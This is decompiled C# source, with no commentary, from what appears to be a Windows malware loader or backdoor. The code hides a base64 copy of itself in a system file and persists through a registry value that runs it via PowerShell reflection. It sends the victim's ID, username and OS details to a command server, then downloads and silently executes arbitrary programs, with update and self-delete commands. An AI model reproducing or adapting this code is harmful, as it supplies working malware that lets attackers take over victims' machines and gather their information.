// Token: 0x06000009 RID: 9 RVA: 0x000023A4 File Offset: 0x000005A4
public static void Install()
{
string contents = Convert.ToBase64String(File.ReadAllBytes(Environment.GetCommandLineArgs()[0]));
File.AppendAllText(Constants.CODE_BASE, contents);
File.SetAttributes(Constants.CODE_BASE, FileAttributes.ReadOnly | FileAttributes.Hidden | FileAttributes.System);
UtilActions.MicroSleep();
Registry.CurrentUser.CreateSubKey("LANMedia2").SetValue("MPEG4Base", string.Format("([System.Reflection.Assembly]::Load([System.Convert]::FromBase64String([System.IO.File]::ReadAllText(\"{0}\")))).EntryPoint.Invoke($null,$null)", Constants.CODE_BASE));
}
// Token: 0x06000003 RID: 3 RVA: 0x0000213C File Offset: 0x0000033C
private static void Main()
{
UtilActions.MicroSleep();
SelfActions.StartUP();
UtilActions.RegularSleep();
if (File.Exists(Constants.CODE_BASE))
{
UtilActions.MicroSleep();
string[] files = Directory.GetFiles(Environment.GetFolderPath(Environment.SpecialFolder.MyPictures), "*.exe");
for (int i = 0; i < files.Length; i++)
{
string path = files[i];
try
{
File.SetAttributes(path, FileAttributes.Normal);
File.Delete(path);
}
catch
{
}
}
using (WebClient webClient = new WebClient())
{
while (true)
{
try
{
string text = webClient.DownloadString(Constants.GATE_URL + UtilActions.BuildQuery());
if (!(text == "D0AF5460E3FA6BE33399A12408D06917FD4DC81308E19AD4B2580BE040DC91954FD58A4242BEEE0B8ECB31097726FDA0DB93CBA325F939E6305A1767886614E7"))
{
if (!(text == "D000000F"))
{
if (!(text == "0E8AC9B2E716A0C3713AA6E34C02688BB4DDC0645483411710BFEDE69D15DAA49ACD44F067280C97E693E083D19008B5DE7968761A6083040349C0A785FF989F"))
{
SelfActions.ExecutePE(text);
}
else
{
SelfActions.Update();
}
}
}
else
{
SelfActions.Delete();
}
}
catch
{
}
UtilActions.RegularSleep();
}
}
}
UtilActions.MicroSleep();
SelfActions.Install();
}
// Token: 0x06000010 RID: 16 RVA: 0x000024B8 File Offset: 0x000006B8
public static string BuildQuery()
{
string iD = UtilActions.GetID();
string text = Uri.EscapeDataString(Environment.GetEnvironmentVariable("USERNAME"));
string text2 = Uri.EscapeDataString(UtilActions.GetDWORD(Constants.REG_PRODUCT_PATH, "ProductName"));
string text3 = Uri.EscapeDataString(UtilActions.GetVersion());
return(string.Format("?E19AD4B2580B={0}&EFF0BCFAA={1}&HC619F6C1A={2}&A27BF6210={3}", new object[]
{
iD,
text,
text2,
text3
}));
}
// Token: 0x06000007 RID: 7 RVA: 0x000022CC File Offset: 0x000004CC
public static void ExecutePE(string page)
{
List <string> expr_1A = new List <string>(page.Split(new string[]
{
"/"
}, StringSplitOptions.RemoveEmptyEntries));
string str = expr_1A[expr_1A.Count - 1];
string fileName = Environment.GetFolderPath(Environment.SpecialFolder.MyPictures) + "\\" + str;
using (WebClient webClient = new WebClient())
{
webClient.DownloadFile(page, fileName);
}
UtilActions.RegularSleep();
Process.Start(new ProcessStartInfo
{
CreateNoWindow = true,
WindowStyle = ProcessWindowStyle.Hidden,
FileName = fileName
});
}
// Token: 0x0600000E RID: 14 RVA: 0x00002456 File Offset: 0x00000656
public static string GetVersion()
{
return(UtilActions.Harp1(File.ReadAllText(Constants.CODE_BASE)));
}
